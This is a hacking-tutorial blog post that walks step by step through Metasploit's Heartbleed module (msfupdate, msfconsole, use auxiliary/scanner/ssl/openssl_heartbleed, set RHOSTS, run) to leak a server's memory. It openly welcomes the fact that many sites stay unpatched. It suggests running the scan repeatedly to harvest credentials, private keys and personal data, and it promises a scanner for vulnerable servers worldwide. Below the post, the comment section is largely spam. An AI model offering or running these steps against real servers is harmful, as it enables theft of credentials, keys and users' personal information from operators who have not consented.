Select Page

Hacking the Heartbleed Vulnerability

Hacking the Heartbleed Vulnerability

Welcome back, my greenhorn hackers!In recent weeks, the Heartbleed vulnerability of OpenSSL has been dominating the information security headlines. This vulnerability enables an attacker to extract data from the server’s memory that may contain authentication credentials, cookies, the servers private key, and personally identifiable info (PII) that could be used for identity theft. As a result, websites around the world have been scrambling to close this hole. Fortunately for us, many still have not, and many may never be closed.

Basically, OpenSSL is an encryption library used in HTTPS (secure HTTP). The idea is that any data traveling over this secured version of HTTP should be secure and encrypted. During communication, OpenSSL uses a “heartbeat” that echoes back data to verify that the data was received correctly. It’s kind of like one machine telling the other, “Yes, I got that data and you can send more now.”

The Heartbleed vulnerability enables a hacker to trick OpenSSL by sending a single byte of data while telling the server it sent 64K bytes of data. The server will then send back 64K bytes of data to be checked and echoed back. The server will then respond with 64K of random data from its memory.

In this tutorial, I’ll show you a simple exploit for getting that OpenSSL to spill the contents of its memory and possibly give us the user’s credentials and other information.

Step 1Update Metasploit

The first step is to update Metasploit to get the new auxiliary module for Heartbleed. Type:

  • kali > msfupdate

Metasploit will then go through the long and slow process of updating its modules and framework. Be patient here, it takes awhile.

MUST READ:  Download Mr. Robot Season 1, 2 [DIRECT DOWNLOAD]

When you are finally returned to the Kali prompt, the update has completed.

Step 2Start Metasploit

Now, we need to start the Metasploit console. At any terminal prompt, type:

  • kali > msfconsole

You should be greeted with a screen like that below.

Step 3Find Heartbleed

Now, we need to find the new Heartbleed module. We can use the built-in search feature in Metasploit. Type:

  • search heartbleed

This should bring up two auxiliary modules for Heartbleed. Select the first one as I’ve highlighted below.

Step 4Use Auxiliary Module

Next, we need to load this payload. Simply type:

  • use auxiliary/scanner/ssl/openssl_heartbleed

This will load the heartbleed module.

Whenever I am using a new module, I like to look at the info page. Once we have loaded the module, type:

  • msf > info

As we can see in the screenshot below, this reveals the options that need to set in order to use this module and a description of the module.

Step 5Set Options

Although this module has numerous options, the critical one is RHOSTS (notice the plural here). Let’s set it to a target website I set up on my network that is still vulnerable to Heartbleed.

  • msf > set RHOSTS 192.168.1.169

Step 6Run the Module

Finally, set the option ‘verbose” to “true”. This will provide us with verbose output.

  • msf > set verbose true

And now let’s run it:

  • msf > run

As you can see in the screenshot below, the server leaked about 64K bytes of what was in its memory.

Step 7Success

If credentials, personally identifiable information (PII), or the server’s private key had been in memory, they would have leaked out as well. Of course, we could set up this Heartbleed scanner to run repeatedly to gather the info in memory at a continual basis, eventually gaining access to all the info that traversed RAM.

MUST READ:  FBI Most Wanted Fugitive JPMorgan Hacker Arrested in New York

In my next Heartbleed post, we will start working on a scanner script to scan the world for websites and servers still vulnerable to the Heartbleed vulnerability, so make sure to come back. While you’re waiting, you can use your spare time to increase your skills in Metasploit by knowing all of the commands and hacking scripts available.


About The Author

He is the brain behind thenexthack.com. He started this platform as a one man army to bring news from the dark side or call it the hidden side of the Internet. He is a security researcher with an interest in cyber attacks, politics, and sport.

18 Comments

  1. I had promises from the Carlsbad Musicians who explained they anticipated they would remember, and would,
    to try make a move that had never happened in Oceanside before.

    Reply
  2. I want making hacker of all things

    Reply
  3. Ray McCleary of Training Center and the Proven Exercise in the Downtown of North Park required
    on Haskins Riverside, of Riverside Submission, CA.

    Reply
  4. Actually when someone doesn’t understand then its up to other viewers that they will
    help, so here it occurs.

    Reply
  5. In this age of digital imaging, it is currently possible to see
    just what your painting project will resemble in the
    majority of any shade before paint starts.

    Reply
  6. Research plans that are shown aboard Lynx and the Early American history fulfill California State
    Specifications.

    Reply
  7. The Municipal Airport is a flat and lighted landing facility, supplying tourists and
    corporations and alternate method of travel into our town.

    Reply
  8. I every time emailed this website post page to all my associates,
    as if like to read it next my contacts will too.

    Reply
  9. Hi, I do think this is an excellent web site. I stumbledupon it ;
    ) I am going to come back once again since I saved as a favorite it.
    Money and freedom is the best way to change, may you be rich and continue to help other people.

    Reply
  10. I am really pleased to read this blog posts which contains tons of helpful facts, thanks for providing such
    information.

    Reply
  11. Hey! I understand this is somewhat off-topic but I had
    to ask. Does building a well-established website like yours require a lot of work?

    I’m completely new to operating a blog but I do write in my diary on a daily basis.

    I’d like to start a blog so I can easily share my personal experience and
    thoughts online. Please let me know if you have any kind of ideas or tips for brand new aspiring bloggers.
    Thankyou!

    Reply
  12. It’s awesome in favor of me to have a web page, which is good for my
    knowledge. thanks admin

    Reply
  13. It’s a pity you don’t have a donate button! I’d certainly donate to this superb blog!
    I suppose for now i’ll settle for book-marking and adding your
    RSS feed to my Google account. I look forward to fresh updates and
    will talk about this blog with my Facebook group. Chat soon!

    Reply
  14. Good blog you’ve got here.. It’s difficult to find good quality writing like
    yours these days. I honestly appreciate people like you!

    Take care!!

    Reply
  15. Hurrah! After all I got a blog from where I know how to truly obtain valuable facts concerning my
    study and knowledge.

    Reply
  16. Awesome article.

    Reply

Leave a reply

Your email address will not be published. Required fields are marked *

Sign up for premium Hacking Tutorials

ADVERTISE

Your ad can be here. Contact us: [email protected]

TNH FORUM

For more Premium Tutorials LIke